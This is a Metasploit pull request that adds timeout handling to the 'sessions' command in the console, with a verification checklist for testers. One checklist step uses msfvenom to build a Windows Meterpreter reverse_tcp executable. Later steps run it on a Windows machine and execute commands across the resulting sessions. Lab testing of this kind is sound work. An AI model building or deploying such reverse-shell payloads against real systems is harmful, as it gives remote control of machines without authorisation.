### PR TITLE
Fix #4431 - Support arbitrary session response timeout

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1705,12 +1705,14 @@ class Core
                   'Channelized' => true,
                   'Hidden'      => true
                 })
+              if process && process.channel
+                data = process.channel.read
+                print_line(data) if data
+              end
             rescue ::Rex::Post::Meterpreter::RequestError
               print_error("Failed: #{$!.class} #{$!}")
-            end
-            if process && process.channel
-              data = process.channel.read
-              print_line(data) if data
+            rescue Rex::TimeoutError
+              print_error("Operation timed out")
             end
           elsif session.type == 'shell'
             output = session.shell_command(cmd)


### PR DESCRIPTION
Fix #4431 

This improves a problem with the session command idling too long, making it look like it's unresponsive or dead from the user's perspective. Painful to use against multiple hosts especially when using -c (execute). Instead of having a hardcoded timeout, this patch allows the value to be configurable.
## Verification

Make sure to do this:
- [x] `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] -f exe > /tmp/x86.exe`
- [x] Copy and paste x86.exe to a Windows machine
- [x] Start msfconsole
- [x] For your listener, make sure you do: `set exitonsession false` and `run -j`
- [x] Execute the x86.exe file a couple of times so you get multiple sessions
- [x] After getting those sessions, make sure you're at the msf prompt
- [x] Do: `sessions -c calc -t 1`
- [x] You should see a bunch of calcs on the Windows machine.
- [x] You should also see a bunch of Operation Timeouts on msfconsole
- [x] Do `sessions -c calc`
- [x] You should see calc for all your sessions again, but this time it's pretty slow
- [x] This time, you will wait about 15 seconds to see each Operation Timeout on msfconsole
- [x] Do `sessions -K`
- [x] You should be able to kill all the sessions
